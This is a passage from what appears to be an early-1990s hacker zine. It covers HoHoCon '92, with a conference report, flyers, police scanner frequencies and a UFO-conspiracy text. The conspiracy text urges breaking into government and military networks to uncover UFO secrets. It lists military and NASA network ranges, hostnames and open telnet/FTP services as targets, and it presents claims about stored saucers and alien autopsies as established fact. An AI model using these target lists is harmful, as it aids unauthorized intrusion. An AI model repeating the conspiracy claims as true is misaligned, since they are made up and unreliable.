  11343.  
  11344. Well, this old boy didn't show until about noon on Saturday.  Of course
  11345. the conference hadn't started yet so we didn't miss anything.  The
  11346. program was kicked off with a number of questions about who, what, where
  11347. and how.  It was difficult to determine how many people were there since
  11348. the room was packed like a can of sardines.  Our estimate was over two
  11349. hundred, not counting the hackers still in their rooms.  Was this
  11350. another drunken free for all, as in the past?  A report was given on
  11351. cellular hacking and toll fraud.  Hackers' rights were presented by an
  11352. attorney.  Also discussed was the stupidity of the press and law
  11353. enforcement.
  11354.  
  11355. Some others talked about suppressed information from the federal
  11356. government concerning UFO's and how hackers are gaining this info.  And
  11357. of course the White House wants to know their sources.
  11358.  
  11359. Hand outs were given including virii and virus source code.  I did
  11360. decline any virii, but who knew what I would get before this was over.
  11361. I believe this was the most responsive and gratifying group I have
  11362. spoken to this year.  I also expect to get more business because of this
  11363. presentation than any other this year.
  11364.  
  11365. A lengthy door prize was held in which I was the winner of more virii.
  11366. Again, I did decline, but passed the winning ticket on.  Captain Crunch
  11367. was the final speaker.  In conclusion, the attendees were the good, the
  11368. bad and the ugly.  We did find HoHoCon very informative and, yes, we
  11369. will attend again.  In closing, I hope each and everyone had a very
  11370. "Merry HoHoCon."
  11371.  
  11372.  
  11373. --------------------------
  11374.  
  11375. A (Hacker's) Mind is a Terrible Mind to Waste
  11376. Unix World, page 136, March 1993
  11377.  
  11378. by Gary Andrew Poole
  11379.  
  11380. [Unix World wanted MONEY to reprint this in full...Yeah, right.
  11381.  Someone already posted it on alt.cyberpunk some time ago
  11382.  if you can't find it anywhere.]
  11383.  
  11384. *-----------------------------------*
  11385.  
  11386.  Various Stuff Picked up at HoHoCon
  11387.  
  11388. *-----------------------------------*
  11389.  
  11390. --------------------------
  11391. Flyer:
  11392. --------------------------
  11393.  
  11394. Unphamiliar Territory
  11395. Phalcon/Skism Western World Headquarters
  11396. The Ghost in The Machine Distribution
  11397.  
  11398. Featuring:
  11399.  
  11400. - 'Neutral Territory' forum where security issues can be discussed with
  11401. top security people in the field.
  11402.  
  11403. - Completely LEGAL forums on computer security, hacking, phraud.
  11404.  
  11405. - Thousands of textfiles covering all aspects of the underground.
  11406.  
  11407. - Hundreds of viruses and virus source code for the serious
  11408. programmer.
  11409.  
  11410. Information:
  11411.  
  11412. - Administrators are Invalid Media, Mercury/NSA, Warlock Bones and
  11413. Jaeger.
  11414.  
  11415. - Run on a professor Falken/LOD donated ZOOM v32bis
  11416.  
  11417. - Mentioned in MONDO 2000 and reviewed in the latest Infoworld.
  11418.  
  11419. - Dialin 602-894-1757 / 24 hours
  11420.  
  11421. --------------------------
  11422. Flyer
  11423. --------------------------
  11424.  
  11425. In your defense..... Courtesy Freeside Orbital Data Network, HoHoCon '92
  11426.                                        - B. O'Blivion
  11427. Repeat after me:
  11428.  
  11429.     "If I am reading this to you, then I believe that you are
  11430. questioning, detaining, or arresting me, or searching my person or
  11431. possessions in the course of your official duties."
  11432.  
  11433.     "I do not consent to any search of seizure of any part of my person
  11434. or property, nor to any property of others under my control.  I do not
  11435. consent to any person's examination, search, or removal of any
  11436. information storage equipment or media in my possession.  You are hereby
  11437. notified that such information storage equipment or media contain
  11438. private written and electronic mail, confidential communications, and
  11439. other material protected under the Electronic Communications Privacy Act
  11440. and other statutes."
  11441.  
  11442.     "I respectfully decline to answer any questions beyond confirmation
  11443. of my identity, and require access to legal counsel immediately.  I
  11444. demand that access to legal counsel be provided to me before any
  11445. questioning takes place.  I will answer no questions nor give any
  11446. information outside the presence of legal counsel.  All requests for
  11447. interviews, statements, consents, or information of any sort should be
  11448. addressed to me through my attorney.  I invoke the rights five to me by
  11449. the Fifth and Sixth Amendments of the Constitution of the United
  11450. States."
  11451.  
  11452.     "I further notify you that the speech and information contained on
  11453. information storage and handling devices at this site are protected
  11454. by the First and Fourth Amendments to the Constitution of the United
  11455. States, and that any unlawful search or seizure of these items or of
  11456. the information they contain will be treated as a violation of the
  11457. Constitutional rights of myself and other users of these devices and
  11458. media."
  11459.  
  11460.     "I further notify you that any such violations of any person's legal
  11461. or Constitutional rights which are committed at any time, by any person,
  11462. will be the subject of civil legal action for all applicable damages
  11463. sustained.  I require that at this time all officers participating in
  11464. this illegal search, seizure, or arrest identify themselves at this time
  11465. by name and badge number to me and my legal counsel."
  11466.  
  11467. [Include if applicable]
  11468.  
  11469.     "I further notify you that I am a Computer System Operator providing
  11470. private electronic mail, electronic publications, and personal
  11471. information storage services to users in this State, and among the
  11472. United States.  Any person causing a breach of the security of, or
  11473. violation of the privacy of, the information and software herein will be
  11474. held liable for all civil damages suffered by any and all users
  11475. thereof."
  11476.  
  11477. --------------------------
  11478. Flyer
  11479. --------------------------
  11480.  
  11481. HoHoCon 1992
  11482. Amusing Local Frequencies
  11483. courtesy of -=RDT.
  11484.  
  11485. Allen Park Inn Security - 464.500           Houston Post - 154.540
  11486.                                                            173.275
  11487.  
  11488.                                                            452.975
  11489. Houston Police:
  11490.  
  11491. North Shepherd Patrol - 460.325
  11492. NE Patrol - 460.125
  11493. SE Patrol - 460.025
  11494. SW Patrol - 460.050
  11495. Central Patrol - 460.100
  11496. Spec. Op. Traffic - 460.350
  11497. Car 2 Car - 460.225
  11498. South Central Patrol - 460.550
  11499. NW Patrol - 460.475
  11500. West Patrol - 460.150
  11501. Accident - 460.375
  11502. Misc - 460.525
  11503.        460.575
  11504.        460.400
  11505. Records - 460.425
  11506. City Marshalls - 453.900
  11507. Paging - 155.670
  11508. Police Intercity - 453-550
  11509.  
  11510.   A number of people have been asking "who is RDT?  what the hell is
  11511. RDT?"  For the record, we're hackers who believe information should be
  11512. free.  All information.  The world is full of phunky electronic gadgets
  11513. and networks, and we want to share our information with the hacker
  11514. community.  We currently write for 2600 magazine, Phrack, Mondo 2000,
  11515. Cybertek, and Informatik.
  11516.   The five "charter members" of RDT are Count Zero, Brian Oblivion,
  11517. Magic Man, White Knight, and Omega.  Each of us has complementary
  11518. skills, and as a group we have a very wide area of technical
  11519. knowledge.  Feel free to contact us.
  11520.  
  11521. Count Zero - count0@ganglia.mgh.harvard.edu
  11522.                          Brian Oblivion - oblivion@ganglia.mgh.harvard.edu
  11523. Magic Man - magic@ganglia.mgh.harvard.edu
  11524.                          White Knight - wknight@ganglia.mgh.harvard.edu
  11525.                          Omega - omega@spica.bu.edu
  11526.  
  11527. "They are satisfying their appetite to know something that is not theirs
  11528. to know."   - Asst. District Attorney Don Ingraham
  11529.  
  11530. "All-you-can eat buffet...for FREE!"  - Restricted Data Transmissions
  11531.  
  11532. RDT  "Truth is Cheap, but Information Costs."
  11533.  
  11534. --------------------------
  11535. Magazine
  11536. --------------------------
  11537.  
  11538. Future Sex
  11539.  
  11540. (a very odd pseudo-cyberpunk skin mag)
  11541.  
  11542. 4 issues for $18, Canada $26, International US $48
  11543.  
  11544. 1095 Market Street
  11545. Suite 809
  11546. San Francisco, CA 94103
  11547. 415-621-5496
  11548. 415-621-4946 fax
  11549.  
  11550. --------------------------
  11551. Video
  11552. --------------------------
  11553.  
  11554. Red  $19.95
  11555. (Phone Pranks can kill)
  11556.  
  11557. Nekromantik II $29.95
  11558. (No comment)
  11559.  
  11560. Available through
  11561.  
  11562. Film Threat Video
  11563. P.O. Box 3170
  11564. Los Angeles, CA
  11565. 90078-3170 USA
  11566.  
  11567. 818-848-8971
  11568.  
  11569. Shipping:  1 tape  $3.40
  11570.            2-3     $4.60
  11571.            4-6     $5.80
  11572.            6+      $7.00
  11573.  
  11574. Visa/MC accepted.
  11575.  
  11576. --------------------------
  11577. Official HoHoCon Crud
  11578. --------------------------
  11579.  
  11580.  
  11581.                                 HoHoCon '92
  11582.  
  11583.                         Product Ordering Information
  11584.  
  11585.  
  11586.     If you are interested in obtaining either HoHoCon shirts or videos,
  11587.                  please contact us at any of the following:
  11588.  
  11589.                             drunkfux@cypher.com
  11590.                              hohocon@cypher.com
  11591.                                cDc@cypher.com
  11592.                             dfx@nuchat.sccsi.com
  11593.                       drunkfux@ganglia.mgh.harvard.edu
  11594.                             359@7354 (WWIV Net)
  11595.  
  11596.                        Freeside Orbital Data Network
  11597.                              ATTN: dFx/HoHoCon
  11598.                        11504 Hughes Road  Suite #124
  11599.                                Houston, Texas
  11600.                                    77089
  11601.  
  11602.                          713-866-4884 (Voice Mail)
  11603.  
  11604.  
  11605.      The shirts are $15 plus $2 shipping ($2.50 for two shirts). At this
  11606.      time, they only come in extra large. We may add additional sizes if
  11607.      there is a demand for them. The front of the shirt has the following
  11608.      in a white strip across the chest:
  11609.  
  11610.  
  11611.                                 I LOVE FEDS
  11612.  
  11613.        (Where LOVE = a red heart, very similar to the I LOVE NY logo)
  11614.  
  11615.  
  11616.                            And this on the back:
  11617.  
  11618.                              dFx & cDc Present
  11619.  
  11620.                                 HOHOCON '92
  11621.  
  11622.                                December 18-20
  11623.                                Allen Park Inn
  11624.                                Houston, Texas
  11625.  
  11626.  
  11627.      There is another version of the shirt available with the following:
  11628.  
  11629.                                 I LOVE WAREZ
  11630.  
  11631.      The video includes footage from all three days, is six hours long and
  11632.      costs $18 plus $2 shipping ($2.50 if purchasing another item also).
  11633.      Please note that if you are purchasing multiple items, you only need
  11634.      to pay one shipping charge of $2.50, not a charge for each item. If
  11635.      you wish to send an order in now, make all checks or money orders
  11636.      payable to O.I.S., include your phone number and mail it to the street
  11637.      address listed above. Allow ten working days for arrival.
  11638.  
  11639.      Thanks to everyone who attended and supported HoHoCon '92. Mail us if
  11640.      you wish to be an early addition to the HoHoCon '93 (December 17-19)
  11641.      mailing list.
  11642.  
  11643. --------------------------
  11644. Text File
  11645. --------------------------
  11646.  
  11647. Rumors have begun to surface about a group of hackers who were involved in a
  11648. project to uncover information regarding the existence of UFOs.  The
  11649. most public example pertaining to this alleged project was seen on
  11650. Dateline NBC on the screen of the mystery hacker "Quentin."
  11651.  
  11652. The story goes that this group of individuals decided to put their
  11653. skills to work on a project that, if successful, would add legitimacy to
  11654. the hacking process by uncovering information on what has been called the
  11655. greatest cover-up in the history of the world.  Milnet TAC ID cards
  11656. were obtained through military officials sympathetic to the cause. Several
  11657. sites and networks were targeted that had in the past been linked to UFO
  11658. activity.  These were sites like the Jet Propulsion Laboratory, Sandia Labs,
  11659. TRW Space Research, American Institute of Physics, and various other
  11660. educational, government and military sites.
  11661.  
  11662. The rumors also emphasize that several sites had what these individuals
  11663. called "particularly heavy security."  Within several seconds after
  11664. connection had been established, system administrators of sites used in
  11665. this project were contacted.  Further rumors state that there was
  11666. information regarding a propulsion system designed utilizing what is
  11667. termed "corona discharge" being analyzed at one site.  The most sinister
  11668. of all rumors states that one particular participant who was allegedly
  11669. deeply immersed in TRWs internal network has not been heard from since
  11670. uncovering data regarding a saucer being housed at one of their Southern
  11671. California installations.
  11672.  
  11673. Believe what you will about the reality of this project.  Much will be
  11674. dismissed as hacker lore, but within the core of every rumor lies a
  11675. grain of truth.
  11676.  
  11677. Are we being lied to?  Why is this information still classified by the NSA?
  11678. What are they hiding from us behind a maze of security?  Will we continue
  11679. to stand idly by and let an uncaring and deliberately evasive government
  11680. shield us from what may be the most important, and potential dangerous
  11681. news to ever surface?  Information wants to be free, and only a
  11682. concerted group effort can make this happen.  How much do you really
  11683. want to know about what is really going on?
  11684.  
  11685. What follows is information that has been released regarding this project...
  11686.  
  11687. ---------------------------------------------------------------------------
  11688.  
  11689. PROJECT ALF-1
  11690.  
  11691. A Planetary Effort
  11692.  
  11693. TOP SECRET TOP SECRET TOP SECRET TOP SECRET TOP SECRET TOP SECRET
  11694. TOP SECRET TOP SECRET TOP SECRET TOP SECRET TOP SECRET TOP SECRET
  11695.  
  11696. These are the raw data.  Where comments are appropriate, they
  11697. will be included.  The data will be grouped together with dates,
  11698. names etc. to make correlations easier.
  11699.  
  11700. There are countless references to the aliens, their down space
  11701. craft and what the Government is doing with them.
  11702. If, as is supposed, the research on the craft and the 'ufonauts'
  11703. continues today, then undoubtedly there are computer records, somewhere.
  11704.  
  11705. I. Searching the Skies; Tripping the Electronic Fence around the
  11706. USA.
  11707.  
  11708. US Space Command Space Surveillance Center, Cheyenne Mountain,
  11709. Colorado Springs, Box Nine (Electronic Surveillance Room)
  11710. (This is where they search for and track UFO activity.)
  11711. U.S. Naval Space Surveillance System, Dahlgreen, Virginia, (Main
  11712. computer), Lake Kickapoo, Texas (listening post): Search for
  11713. 'Flash Traffic'
  11714. Commander Sheila Mondran
  11715. CINC-NORAD
  11716. Space Detection and Tracking System
  11717. Malabar, Forida
  11718. 'Teal Amber' search
  11719. National Military Command Center - Pentagon
  11720. (These are the areas where UFO activity is tracked.
  11721. There is a radar shield around the country that is 'tripped' by UFO's.
  11722. All tracking and F14 scrambling is done through this system.)
  11723.  
  11724. II. The Second Cover Up
  11725.  
  11726. Defense Intelligence Agency
  11727. Directorate for Management and Operations
  11728. Project Aquarius (in conjunction with SRI)
  11729.  
  11730. Colonel Harold E. Phillips, Army (where/what Feb. 1987)
  11731. UFO Working Group, (formed Dec 1987)
  11732. Major General James Pfautz, USAF, Ret. (March 87)
  11733. US Army experiments -(Monroe Institute, Faber, VA)
  11734. Major General Albert Stubblebine
  11735. Capt. Guy Kirkwood,
  11736. (thousands of feet of film of UFO's catalogued and on record somewhere.)
  11737. The UFO Working Group was formed because one arm of the Govt doesn't
  11738. know what the other is doing.)
  11739.  
  11740. III. National Security
  11741.  
  11742. NSA NAtional Security Agency, Dundee Society (Super secret elite
  11743. who have worked on UFO's.)
  11744. NSA - Research and Engineering Division
  11745. NSA - Intercept Equipment Division
  11746.  
  11747. Kirtland Force Base, Office of Special Investigations, Project
  11748. Beta. 1979-83-?  (Sandia Labs are here.)
  11749. Paul Bennewitz
  11750. Project Blue
  11751. Project Blue Book
  11752.  
  11753. (NSA computers do analysis for Pentagon.)
  11754.  
  11755. IV. More Secret Players
  11756.  
  11757. NASA, Fort Irwin, Barstow, CA
  11758. NASA Ames Research Center, Moffet Field Naval Base
  11759. SETI
  11760. State Dept. Office of Advanced Technology
  11761. Any Astronauts from Mercury, Gemini and Apollo
  11762. CIA - Office of Scientific Investigation
  11763. CIA - Domestic Collection Division
  11764.  
  11765. (NASA has known about UFO's since the astronauts saw and photoed them.
  11766. Records somewhere.)
  11767.  
  11768. V.  Dealing with the Secret
  11769.  
  11770. MJ-12 (1952)
  11771. Majectic 12
  11772. Operation Majestic 12
  11773. MAJIC-12
  11774. Admiral Roscoe H. Hillenkoetter
  11775. Dr. Vannevar Bush
  11776. Dr. Detlev Bronk
  11777. Dr. Jerome Hunsaker
  11778. Dr. Donald Menzel
  11779. Dr. Lloyd Berkner
  11780. General Robt. Montague
  11781. Sidney Souers
  11782. Gordon Gray
  11783. General Hoyt Vandenberg
  11784. Sect State James Forrestal
  11785. General Nathan Twining
  11786. Pres. Truman
  11787. Pres. Eisenhower
  11788.  
  11789. (One of the biggest secrets ever.)
  11790.  
  11791. Nevada Desert, Area 51, S4 (houses UFO's)
  11792. (Robert Lazar talked!) 9 space ships on storage. Propulsion by
  11793. corona discharge.
  11794.  
  11795. (Area 51 is the most protected base on the planet.)
  11796.  
  11797. VI. ROSWELL, NM Crashes
  11798. Mac Brazel (farmer)
  11799. Major Jesse A. Marcel
  11800. 509th. Bomber Group
  11801. Lewis Rickett, CIC Officer
  11802. Colonel William Blanchard
  11803. Gerald Anderson, witness to crash and aliens
  11804.  
  11805. Wright Patterson Air Force Base, (parts lists of UFO's catalogued;
  11806. autopsies on record) (Bodies in underground facility)
  11807. Foreign Technology Building
  11808. USAAF (United States Army Air Force reports: "Early Automation"
  11809. Muroc, CA (Base with UFO's for study)
  11810.  
  11811. (1 saucer with 4 aliens.  They were transported to Wright and then
  11812. saved, catalogued and autopsied.)
  11813.  
  11814.  
  11815. VII. THOSE ON GOVT SHIT LIST
  11816.  
  11817. (People who have gotten close.)
  11818.  
  11819. Robert Lazar
  11820. Major Donald Keyhoe
  11821. William Moore
  11822. Stanton Friedman
  11823. Jaime Shandera
  11824. Whitley Streiber
  11825. Timothy Goode, UK
  11826.  
  11827. Other UFO Crashes
  11828. Del Rio, TX 12/50, Colonel Robert Willingham
  11829. Las Vegas, 4/18/62
  11830. Kecksburg, PA 12/9/65
  11831.  
  11832.  
  11833. VIII. International
  11834.  
  11835. Belgian Air Force.  (They are going public and have records.
  11836. Press conference held 7/12/91.)
  11837. Australian Air Force
  11838. UK; GCHQ
  11839. British Air Force
  11840. Belgium:
  11841. NATO Radar Stations
  11842.  
  11843.  
  11844. IX. UFO Civilian Groups. (What do they really know?)
  11845.  
  11846. NICAP, National Investigations Committee on Aerial Phenomena
  11847. (private company.)
  11848.  
  11849. APRO, Tucson, AZ (Aerial Phenomona Research Organization,
  11850. private company.)
  11851.  
  11852. MUFON Mutual UFO Network
  11853.  
  11854. X. GENERAL
  11855.  
  11856. Kenneth Arnold, June 24, 1947
  11857. Cattle and Sheep Mutilations
  11858. General and Pres. Eisenhower, (private files and library)
  11859. President Truman
  11860. Wright Field or Wright Patterson Air Force Base, Dayton, OH, (Air
  11861. Force Foriegn Technology Division)
  11862. USAF Project Saint
  11863. USAF Project Gemini
  11864. Project Moon Dust
  11865. Project Sign
  11866. Project Grudge
  11867. General Hoyt Vandenberg (1940-1960)
  11868. Air Force Regulation 200-2 (8/12/54)
  11869. Holloman AFB, NM
  11870. Roswell, NM July 7, 1947
  11871.  
  11872.  
  11873. XI. Possible Searches
  11874.  
  11875. Presidential Libraries
  11876. Old USAAF, (United States Army Air Force)
  11877. NASA
  11878. Astronaut Frank Borman, Gemini 7, pictures of UFO
  11879. Neil Armstrong, Apollo 11, saw UFO's on moon.
  11880. Colonel Gordon Cooper saw a bunch of them
  11881. James McDivitt, 6/66
  11882. United Nations
  11883. NATO;
  11884. General Lionel Max Chassin, French Air Force
  11885. Star Wars, United Kingdom, 23 scientists killed in 6 years.
  11886. Gulf Breeze, FL
  11887. Additional UFO records at NSA, CIA, DIA,  FBI
  11888.  
  11889.  
  11890. Good Searching.
  11891.  
  11892. ----------------------------------------------------------------------
  11893.                     Project
  11894.                 ->Green Cheese<-
  11895.                    Data Base
  11896. ---------------------------------------------------------------------
  11897. Holloman AFB
  11898.    Location: New Mexico.  Preconceived landing 15 years ago.
  11899.  
  11900. DDN Locations:
  11901. --------------
  11902.  
  11903. NET : 132.5.0.0 : HOLLOMAN :
  11904.  
  11905. GATEWAY : 26.9.0.74, 132.5.0.1 : HOLLOMAN-GW.AF.MIL : CISCO-MGS :: EGP,IP/GW :
  11906. GATEWAY : 26.9.0.74, 132.5.0.1 : HOLLOMAN-GW.AF.MIL : CISCO-MGS :: EGP,IP/GW :
  11907.  
  11908. HOST : 26.10.0.74 : HOLLOMAN-TG.AF.MIL : VAX-8650 : VMS : TCP/FTP,TCP/TELNET,TCP
  11909.        SMTP :
  11910.  
  11911. HOST : 26.6.0.74 : HOLLOMAN-AM1.AF.MIL : WANG-VS100 : VSOS : TCP/TELNET,TCP/FTP,
  11912.        TCP/SMTP :
  11913.  
  11914. Host: DDNVAX2.6585TG.AF.MIL
  11915.       156.6.1.2
  11916.  
  11917. -----------------------------------------------------------------------
  11918.  
  11919. Kirtland Air Force Base
  11920.     Office Of Special Investigations.  Sandia Labs are here. Also part of
  11921.     NSA Intercept Equipment Division.
  11922.  
  11923. Key Words/names:
  11924. ----------------
  11925. Sandia Labs
  11926. Project Beta (1979-83-?)
  11927. Paul Bennewitz
  11928. Project Blue
  11929. Project Blue Book
  11930.  
  11931. DDN Locations:
  11932. --------------
  11933.  
  11934. NET : 131.23.0.0 : KIRTLAND-NET :
  11935. NET : 132.62.0.0 : KIRTLAND2 :
  11936. GATEWAY : 26.17.0.48, 131.23.0.1 : KIRTLAND2-GW.AF.MIL,KIRTLAND-GW.AF.MIL
  11937.         : CISCO-MGS : UNIX : IP/GW,EGP :
  11938. GATEWAY : 26.18.0.87, 132.62.0.1
  11939.         : KIRTLAND1-GW.AF.MIL,KIRTLAND1606ABW-GW.AF.MIL : CISCO-MGS :
  11940.         : EGP,IP/GW :
  11941. HOST : 26.0.0.48 : KIRTLAND.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
  11942. HOST : 26.0.0.87 : KIRTLAND2.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
  11943. HOST : 26.6.0.87 : KIRTLAND-AM1.AF.MIL : WANG-VS300 : VS ::
  11944.  
  11945. -----------------------------------------------------------------------
  11946.  
  11947. NASA
  11948.    What can I say about NASA that you couldnt guess for yourself....
  11949.    (Except that the following sights are SPECIFIC NASA sights, not
  11950.    just randomly suspected sights).
  11951.  
  11952. DDN locations:
  11953. --------------
  11954.  
  11955. Fort Irwin, Barstow, CA:
  11956. -----------------------
  11957. NET : 134.66.0.0 : IRWIN :
  11958. NET : 144.146.0.0 : FTIRWIN1 :
  11959. NET : 144.147.0.0 : FTIRWIN2 :
  11960. GATEWAY : 26.24.0.85, 26.7.0.230, 144.146.0.1, 144.147.0.0
  11961.         : FTIRWIN-GW1.ARMY.MIL : CISCO-GATEWAY : CISCO : IP/GW,EGP :
  11962. HOST : 26.14.0.39 : IRWIN-ASBN.ARMY.MIL : NCR-COMTEN-3650 : COS2 ::
  11963. HOST : 26.13.0.85 : FTIRWIN-AMEDD.ARMY.MIL : ATT-3B2-600G : UNIX
  11964.      : TCP/FTP,TCP/SMTP,TCP/TELNET :
  11965. HOST : 26.14.0.85 : FTIRWIN-IGNET.ARMY.MIL : DATAPOINT-8605 : RMS ::
  11966. HOST : 26.15.0.85 : IRWIN-EMH1.ARMY.MIL,FTIRWIN-EMH1.ARMY.MIL : SPERRY-5000
  11967.      : UNIX : TCP/FTP,TCP/SMTP,TCP/TELNET :
  11968.  
  11969. Moffet Field Naval Base (Ames Research Center):
  11970. -----------------------------------------------
  11971. GATEWAY : 26.20.0.16, 192.52.195.1 : MOFFETT-FLD-MB.DDN.MIL,AMES-MB.DDN.MIL
  11972.         : C/70 : CHRYSALIS : IP/GW,EGP :
  11973. HOST : 26.0.0.16 : MOFFETT.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
  11974.  
  11975. -----------------------------------------------------------------------
  11976. Pentagon (National Military Command Center)
  11977.     One of many places in charge of tracking UFO activity.
  11978.  
  11979. Possible DDN sights:
  11980. -------------------
  11981.  
  11982. GATEWAY : 26.9.0.26, 134.205.123.140 : PENTAGON-GW.HQ.AF.MIL : CISCO-AGS :
  11983.         : EGP,IP/GW :
  11984. GATEWAY : 26.25.0.26, 131.8.0.1 : PENTAGON-GW.AF.MIL,HQUSAFNET-GW.AF.MIL
  11985.         : CISCO-MGS :: IP/GW,EGP :
  11986. GATEWAY : 26.10.0.76, 192.31.75.235 : PENTAGON-BCN-GW.ARMY.MIL : SUN-360
  11987.         : UNIX : IP/GW,EGP :
  11988. GATEWAY : 26.26.0.247, 192.31.75.1 : PENTAGON-GW.ARMY.MIL : SUN-3/160
  11989.         : UNIX : EGP,IP/GW :
  11990. GATEWAY : 26.31.0.247, 26.16.0.26, 141.116.0.1 : PENTAGON-GW1.ARMY.MIL
  11991.         : CISCO : CISCO : IP/GW,EGP :
  11992. HOST : 26.0.0.26 : PENTAGON.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
  11993. HOST : 26.24.0.26 : OPSNET-PENTAGON.AF.MIL : VAX-8500 : VMS
  11994.      : TCP/TELNET,TCP/FTP,TCP/SMTP :
  11995. HOST : 26.10.0.76, 192.31.75.235 : PENTAGON-BCN.ARMY.MIL : SUN-360 : UNIX
  11996.      : TCP/FTP,TCP/SMTP,TCP/TELNET :
  11997. HOST : 26.0.0.247 : PENTAGON2.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
  11998. HOST : 26.7.0.247 : PENTAGON-AMSNET.ARMY.MIL : AMDAHL : MVS
  11999.      : TCP/TELNET,TCP/FTP :
  12000. HOST : 26.14.0.247 : NSSC-PENTAGON.NAVY.MIL : ALTOS-3068A : UNIX
  12001.      : TCP/FTP,TCP/TELNET,TCP/SMTP :
  12002. HOST : 26.18.0.247 : PENTAGON-EMH4.ARMY.MIL : SPERRY-5000/80 : UNIX
  12003.      : TCP/TELNET,TCP/FTP,TCP/SMTP :
  12004. HOST : 26.26.0.247, 192.31.75.1 : PENTAGON-AI.ARMY.MIL : SUN-3/160 : UNIX
  12005.      : TCP/TELNET,TCP/FTP,TCP/SMTP,TCP/FINGER :
  12006.  
  12007. -----------------------------------------------------------------------
  12008.  
  12009. Raddaman
  12010.    Location of infamous building 18a.  Suspected saucers and others?
  12011.  
  12012. DDN location, yet unknown.
  12013.  
  12014. ------------------------------------------------------------------------
  12015.  
  12016. SECI
  12017.      ?
  12018.  
  12019. DDN Locations:
  12020. --------------
  12021.  
  12022. NET : 192.108.216.0 : ARC-SETI-NET :
  12023.  
  12024. ------------------------------------------------------------------------
  12025.  
  12026. Uah Locations:
  12027.  
  12028. GATEWAY : 26.18.0.20, 131.27.0.1 : HILL-GW.AF.MIL,HILLAFBNET-GW.AF.MIL
  12029.        : CISCO-MGS :: IP/GW,EGP :
  12030.  
  12031. GATEWAY : 26.18.0.20, 131.27.0.1 : HILL-GW.AF.MIL,HILLAFBNET-GW.AF.MIL
  12032.         : CISCO-MGS :: IP/GW,EGP :
  12033.  
  12034. HOST : 26.5.0.20 : HILL.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
  12035. HOST : 26.0.0.99 : HILL2.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
  12036. HOST : 26.12.0.99 : HILL-AM1.AF.MIL : WANG-VS100 : VS
  12037.      : TCP/TELNET,TCP/FTP,TCP/SMTP :
  12038.  
  12039. -------------------------------------------------------------------------
  12040.  
  12041. Wright Patterson AFB
  12042.  Catalogued UFO parts list.  Autopsies on record.  Bodies located in
  12043.  underground facility of Foreign Technology Building.
  12044.  
  12045. DDN Locations:
  12046. --------------
  12047.  
  12048. HOST : 26.0.0.47 : WRIGHTPAT.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
  12049. HOST : 26.8.0.123 : WRIGHTPAT2.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
  12050. HOST : 26.0.0.124 : WRIGHTPAT3.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
  12051. HOST : 26.3.0.170 : WAINWRIGHT-IGNET.ARMY.MIL : CONVERGENT-TECH-CN-100
  12052.      : CTOS ::
  12053. HOST : 26.0.0.176 : WRIGHTPAT4.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
  12054.  
  12055. -------------------------------------------------------------------------
  12056.  
  12057. Nevada:
  12058.  
  12059. NET : 131.216.0.0 : NEVADA :
  12060.  
  12061. -------------------------------------------------------------------------
  12062.  
  12063. Random Suspected Nets:
  12064.  
  12065. WIN:
  12066.   Top Secret Network.  All coordinator's have last name Win.
  12067.  
  12068. NET : 141.8.0.0  : DFN-WIN8  : NET : 141.9.0.0  : DFN-WIN9  :
  12069. NET : 141.10.0.0 : DFN-WIN10 : NET : 141.15.0.0 : DFN-WIN15 :
  12070. NET : 141.25.0.0 : DFN-WIN25 : NET : 141.26.0.0 : DFN-WIN26 :
  12071. NET : 141.28.0.0 : DFN-WIN28 : NET : 141.57.0.0 : DFN-WIN57 :
  12072. NET : 141.58.0.0 : DFN-WIN58 : NET : 141.59.0.0 : DFN-WIN59 :
  12073. NET : 141.60.0.0 : DFN-WIN60 : NET : 141.61.0.0 : DFN-WIN61 :
  12074. NET : 141.62.0.0 : DFN-WIN62 : NET : 141.63.0.0 : DFN-WIN63 :
  12075. NET : 141.64.0.0 : DFN-WIN64 : NET : 141.65.0.0 : DFN-WIN65 :
  12076. NET : 141.66.0.0 : DFN-WIN66 : NET : 141.67.0.0 : DFN-WIN67 :
  12077. NET : 141.68.0.0 : DFN-WIN68 : NET : 141.69.0.0 : DFN-WIN69 :
  12078. NET : 141.70.0.0 : DFN-WIN70 : NET : 141.71.0.0 : DFN-WIN71 :
  12079. NET : 141.72.0.0 : DFN-WIN72 : NET : 141.73.0.0 : DFN-WIN73 :
  12080. NET : 141.74.0.0 : DFN-WIN74 : NET : 141.75.0.0 : DFN-WIN75 :
  12081. NET : 141.76.0.0 : DFN-WIN76 : NET : 141.77.0.0 : DFN-WIN77 :
  12082. NET : 141.78.0.0 : DFN-WIN78 : NET : 141.79.0.0 : DFN-WIN79 :
  12083. NET : 141.80.0.0 : DFN-WIN80 : NET : 141.81.0.0 : DFN-WIN81 :
  12084. NET : 141.82.0.0 : DFN-WIN82 : NET : 141.83.0.0 : DFN-WIN83 :
  12085. NET : 141.84.0.0 : DFN-WIN84 : NET : 141.85.0.0 : DFN-WIN85 :
  12086. NET : 141.86.0.0 : DFN-WIN86 : NET : 141.87.0.0 : DFN-WIN87 :
  12087. NET : 141.88.0.0 : DFN-WIN88 : NET : 141.89.0.0 : DFN-WIN89 :
  12088. NET : 141.90.0.0 : DFN-WIN90 : NET : 141.91.0.0 : DFN-WIN91 :
  12089. NET : 141.92.0.0 : DFN-WIN92 : NET : 141.93.0.0 : DFN-WIN93 :
  12090. NET : 141.94.0.0 : DFN-WIN94 : NET : 141.95.0.0 : DFN-WIN95 :
  12091. NET : 141.96.0.0 : DFN-WIN96 : NET : 141.97.0.0 : DFN-WIN7 :
  12092. NET : 141.98.0.0 : DFN-WIN98 : NET : 141.99.0.0 : DFN-WIN99 :
  12093. NET : 188.1.0.0  : WIN-IP    : NET : 192.80.90.0 : WINDATA  :
  12094.  
  12095. -----------------------------------
  12096.  
  12097. Scinet:
  12098.       Sensitive Compartmented Information Network
  12099.  
  12100. NET : 192.12.188.0 : BU-SCINET :
  12101.  
  12102. -----------------------------------
  12103.  
  12104. Disnet:
  12105.       Defense Integrated Secure Network.  Composed of SCINET, WINCS
  12106.       ([World Wide Military and Command Control System] Intercomputer
